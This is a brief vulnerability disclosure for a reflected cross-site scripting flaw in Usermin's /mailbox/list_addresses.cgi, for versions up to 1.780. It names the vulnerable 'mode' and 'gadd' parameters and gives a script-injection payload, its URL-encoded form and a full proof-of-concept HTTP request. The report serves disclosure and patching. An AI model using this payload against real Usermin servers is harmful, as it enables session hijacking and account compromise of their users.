#478 XSS (cross-site scripting) vulnerability in /mailbox/list_addresses.cgi
Affects Usermin versions up to 1.780.
Testing done by setting all user input parameters to: >"'><script>alert(1)</script>
The following parameters were found vulnerable:
Set parameter 'mode's value to '%3E%22%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
Set parameter 'gadd's value to '%3E%22%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
This alllowed to successfully embed a script in the response, which than executed when the page loaded in the user's browser.
Sample Proof-of-Concept:
GET /mailbox/list_addresses.cgi?mode=%3E%22%27%3E%3Cscript%3Ealert%28847%29%3C%2Fscript%3E&gadd=%3E%22%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Referer: https://10.0.0.5:20000/mailbox/list_addresses.cgi
Cookie: usid=f610dae7a3720a29d43a7493da7147f8; testing=1; redirect=1
Connection: Keep-Alive
Host: 10.0.0.5:20000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US
Usermin was inatslled on Ubuntu 18.04.
